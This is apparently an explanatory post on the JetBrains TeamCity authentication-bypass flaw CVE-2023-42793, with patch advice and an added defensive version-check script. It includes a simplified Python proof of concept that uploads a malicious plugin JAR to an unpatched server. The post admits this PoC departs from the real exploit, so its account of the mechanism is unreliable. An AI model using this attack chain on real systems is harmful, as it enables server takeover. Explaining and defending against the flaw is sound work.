CVE-2023-42793 is a critical vulnerability discovered in JetBrains TeamCity, affecting all versions prior to 2023.05.4. If you run an unpatched TeamCity server, attackers could bypass authentication and achieve remote code execution (RCE) with ease. This flaw made hundreds of TeamCity servers worldwide sitting ducks for attackers. In this exclusive post, we’ll break down how the exploit worked, look at a simplified code example, and show you how attackers abused this bug. We’ll keep the language simple – you don’t need to be a pro to follow along.
What is JetBrains TeamCity?
TeamCity is a popular continuous integration and build management server used by enterprises and developers. It helps you automate builds, tests, and deployments. Usually, access to TeamCity is tightly controlled: you need credentials to do anything meaningful.
Read the official JetBrains advisory: TeamCity Security Advisory.
CVE-2023-42793 is an authentication bypass vulnerability that in practice allows any unauthenticated user to get administrator access. From there, attackers can upload plugins containing malicious code, execute arbitrary scripts, fully compromise the TeamCity server, and use the server to pivot into corporate networks.
Impacted Versions: all TeamCity releases prior to 2023.05.4.
If you haven’t patched your TeamCity server, stop reading and do it now.
Exploit Details: How Did Attackers Do It?
The core issue lies in TeamCity's web API (REST API). Certain endpoints failed to verify if you were logged in before allowing sensitive operations.
TeamCity exposes its REST API at endpoints under /app/rest/.
Normally, doing anything here requires authentication (session or token). However, due to a logic bug in the code for user management and plugin upload, a specific API endpoint failed to check if requests were authenticated.
Attackers could register an admin session and upload a plugin just by sending a properly crafted API request!
Proof of Concept Exploit Code
For educational purposes, here’s a simplified Python example (don’t use this on any system you do not own or have permission to test):
import requests

target = "http://teamcity.example.com"  # Change to target server

# Step 1: Attempt to get an unauthenticated admin token
r = requests.get(f"{target}/app/rest/server", headers={
    "Accept": "application/json"
})

# Check for session cookie or auth info
if 'teamcity.session' in r.cookies:
    session_cookie = r.cookies['teamcity.session']
    print(f"Got session cookie: {session_cookie}")

    # Step 2: Upload a malicious plugin (JAR file)
    with open('exploit.jar', 'rb') as jar:
        files = {
            'file': ('exploit.jar', jar, 'application/java-archive'),
        }
        r2 = requests.post(f"{target}/app/rest/plugins",
                           cookies={'teamcity.session': session_cookie},
                           files=files)
    if r2.status_code == 200:
        print("Plugin uploaded, server exploited!")
    else:
        print("Plugin upload failed:", r2.status_code)
else:
    print("Failed to get admin session, target might be patched.")
Note: The actual exploit may use a slightly different endpoint or token extraction, but this illustrates the vulnerability chain.
Real-World Exploitation
These were not theoretical attacks. Shadowserver tracked over 1,400 vulnerable public TeamCity servers right after the vulnerability dropped. Ransomware groups and APT actors were observed scanning and compromising unpatched servers.
How To Fix and Protect Yourself
- Update TeamCity ASAP: Go to the JetBrains download page and install 2023.05.4 or later.
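To find which of your own servers still need that update, here is an added triage helper (written for this post, not code from JetBrains or the original author). It assumes the fixed version is 2023.05.4 as stated above, that TeamCity version strings look like "2023.05.3 (build 129390)", and that /app/rest/server returns a JSON "version" field when queried with an access token.

```python
"""Triage helper: is a TeamCity version string affected by CVE-2023-42793?

Added example, not part of the original post. Assumptions: the first fixed
release is 2023.05.4; version strings look like "2023.05.3 (build 129390)"
or "2022.10"; GET /app/rest/server with Accept: application/json returns a
JSON object with a "version" field (the Bearer token header is assumed).
"""
import json
import re
import urllib.request
from typing import Optional, Tuple

FIXED_VERSION: Tuple[int, ...] = (2023, 5, 4)   # first patched release
_VERSION_RE = re.compile(r"^\s*(\d+(?:\.\d+)*)")  # leading dotted numbers

def parse_version(version_str: str) -> Tuple[int, ...]:
    """Turn '2023.05.3 (build 129390)' into (2023, 5, 3); ValueError if unparsable."""
    m = _VERSION_RE.match(version_str)
    if not m:
        raise ValueError(f"unrecognised TeamCity version: {version_str!r}")
    return tuple(int(part) for part in m.group(1).split("."))

def is_vulnerable(version_str: str) -> bool:
    """True when the version predates 2023.05.4.
    Shorter tuples are zero-padded, so '2023.05' compares as (2023, 5, 0)."""
    v = parse_version(version_str)
    width = max(len(v), len(FIXED_VERSION))
    padded = v + (0,) * (width - len(v))
    fixed = FIXED_VERSION + (0,) * (width - len(FIXED_VERSION))
    return padded < fixed

def fetch_version(base_url: str, token: Optional[str] = None) -> str:
    """Read the 'version' field from <base_url>/app/rest/server (assumed JSON shape)."""
    req = urllib.request.Request(f"{base_url.rstrip('/')}/app/rest/server",
                                 headers={"Accept": "application/json"})
    if token:  # assumption: access tokens are accepted as a Bearer header
        req.add_header("Authorization", f"Bearer {token}")
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)["version"]

if __name__ == "__main__":
    import sys
    ver = fetch_version(sys.argv[1], sys.argv[2] if len(sys.argv) > 2 else None)
    print(ver, "-> VULNERABLE, patch now" if is_vulnerable(ver) else "-> fixed")
```

Run it as `python3 check.py https://teamcity.internal <access-token>` against each server in your inventory; a version like 2023.11 compares as newer than 2023.05.4 and is reported as fixed.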
Additional Resources & References
1. JetBrains Advisory
2. Rapid7 Insight
3. Huntress Writeup
4. Shadowserver Stats
In Summary
CVE-2023-42793 is a wake-up call. If you use TeamCity, patch right now and check your logs for signs of past compromise. This bug shows how a small web app mistake can open the door to full infrastructure takeovers. Stay alert and keep your tools up-to-date!
Timeline
Published on: 09/19/2023 17:15:08 UTC
Last modified on: 10/03/2023 15:44:06 UTC